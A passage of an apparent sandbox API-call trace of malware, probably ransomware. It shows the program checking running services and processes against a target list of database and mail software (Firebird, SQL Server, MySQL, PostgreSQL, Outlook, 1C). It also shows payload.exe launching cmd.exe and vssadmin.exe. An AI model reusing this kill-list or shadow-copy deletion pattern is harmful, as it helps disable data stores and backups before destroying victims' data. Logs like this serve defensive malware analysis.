lpString2="WinHttpAutoProxySvc") returned -1 [0058.113] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0058.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0058.113] lstrlenW (lpString="Winmgmt") returned 7 [0058.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0058.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0058.113] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0058.113] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0058.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0058.113] lstrlenW (lpString="WPDBusEnum") returned 10 [0058.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0058.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0058.114] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0058.114] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0058.114] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0058.114] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6c08c8 | out: hHeap=0x5d0000) returned 1 [0058.114] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c8 [0058.118] Process32FirstW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0058.119] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0058.120] lstrlenW (lpString="System") returned 6 [0058.120] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0058.120] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0058.120] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0058.120] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0058.120] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0058.120] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0058.120] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0058.120] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0058.121] lstrlenW (lpString="smss.exe") returned 8 [0058.121] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0058.121] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0058.121] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0058.121] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0058.121] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0058.121] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0058.121] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0058.121] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0058.122] lstrlenW (lpString="csrss.exe") returned 9 [0058.122] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0058.122] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0058.122] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0058.122] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0058.122] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0058.122] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0058.122] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0058.122] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0058.122] lstrlenW (lpString="wininit.exe") returned 11 [0058.123] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0058.123] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0058.123] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0058.123] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0058.124] lstrlenW (lpString="csrss.exe") returned 9 [0058.124] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0058.124] lstrlenW (lpString="winlogon.exe") returned 12 [0058.124] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0058.125] lstrlenW (lpString="services.exe") returned 12 [0058.125] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0058.126] lstrlenW (lpString="lsass.exe") returned 9 [0058.126] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0058.127] lstrlenW (lpString="lsm.exe") returned 7 [0058.127] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.127] lstrlenW (lpString="svchost.exe") returned 11 [0058.127] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.128] lstrlenW (lpString="svchost.exe") returned 11 [0058.128] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.129] lstrlenW (lpString="svchost.exe") returned 11 [0058.129] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.130] lstrlenW (lpString="svchost.exe") returned 11 [0058.130] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.131] lstrlenW (lpString="svchost.exe") returned 11 [0058.131] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0058.131] lstrlenW (lpString="audiodg.exe") returned 11 [0058.131] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.132] lstrlenW (lpString="svchost.exe") returned 11 [0058.132] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.133] lstrlenW (lpString="svchost.exe") returned 11 [0058.133] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0058.133] lstrlenW (lpString="dwm.exe") returned 7 [0058.133] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0058.134] lstrlenW (lpString="explorer.exe") returned 12 [0058.134] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0058.135] lstrlenW (lpString="spoolsv.exe") returned 11 [0058.135] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0058.135] lstrlenW (lpString="taskhost.exe") returned 12 [0058.136] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.136] lstrlenW (lpString="svchost.exe") returned 11 [0058.136] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0058.226] lstrlenW (lpString="taskeng.exe") returned 11 [0058.227] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0058.235] lstrlenW (lpString="taskhost.exe") returned 12 [0058.237] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0058.261] lstrlenW (lpString="carried trinity.exe") returned 19 [0058.261] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0058.262] lstrlenW (lpString="heaven.exe") returned 10 [0058.262] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0058.263] lstrlenW (lpString="dell.exe") returned 8 [0058.263] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0058.263] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0058.263] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0058.264] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0058.264] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0058.265] lstrlenW (lpString="til ear equal.exe") returned 17 [0058.265] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0058.267] lstrlenW (lpString="itunes-bring.exe") returned 16 [0058.267] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0058.268] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0058.268] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0058.269] lstrlenW (lpString="philadelphia.exe") returned 16 [0058.269] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0058.269] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0058.269] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0058.270] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0058.270] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0058.271] lstrlenW (lpString="fraud stuck.exe") returned 15 [0058.271] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0058.271] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0058.272] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0058.272] lstrlenW (lpString="attended.exe") returned 12 [0058.272] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0058.273] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0058.273] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0058.274] lstrlenW (lpString="pan physician.exe") returned 17 [0058.274] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0058.274] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0058.275] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0058.275] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0058.275] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0058.276] lstrlenW (lpString="over-celebrity.exe") returned 18 [0058.276] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0058.277] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0058.277] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0058.277] lstrlenW (lpString="payload.exe") returned 11 [0058.277] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0058.278] lstrlenW (lpString="cmd.exe") returned 7 [0058.278] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0058.279] lstrlenW (lpString="conhost.exe") returned 11 [0058.279] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0058.279] lstrlenW (lpString="vssadmin.exe") returned 12 [0058.279] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0058.280] lstrlenW (lpString="VSSVC.exe") returned 9 [0058.280] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.281] lstrlenW (lpString="svchost.exe") returned 11 [0058.281] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0058.282] CloseHandle (hObject=0x1c8) returned 1 [0058.282] Sleep (dwMilliseconds=0x1f4) [0059.340] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x625d20 [0059.344] EnumServicesStatusExW (in: hSCManager=0x625d20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0059.348] GetLastError () returned 0xea [0059.348] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12c6) returned 0x6c08c8 [0059.349] EnumServicesStatusExW (in: hSCManager=0x625d20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6c08c8, cbBufSize=0x12c6, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6c08c8, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0059.357] CloseServiceHandle (hSCObject=0x625d20) returned 1 [0059.360] lstrlenW (lpString="Appinfo") returned 7 [0059.360] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0059.360] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0059.361] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0059.361] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0059.362] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0059.362] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0059.362] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0059.363] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0059.363] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0059.364] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0059.364] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0059.364] lstrlenW (lpString="AudioSrv") returned 8 [0059.364] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0059.365] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0059.365] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0059.366] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0059.366] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0059.366] lstrlenW (lpString="BFE") returned 3 [0059.366] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0059.366] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0059.367] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0059.367] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0059.367] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0059.368] lstrlenW (lpString="CryptSvc") returned 8 [0059.368] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0059.368] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0059.369] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0059.369] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0059.370] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0059.370] lstrlenW (lpString="CscService") returned 10 [0059.370] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0059.371] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0059.371] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0059.372] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0059.372] lstrcmpiW (lpString1="sqlserveradhelper", 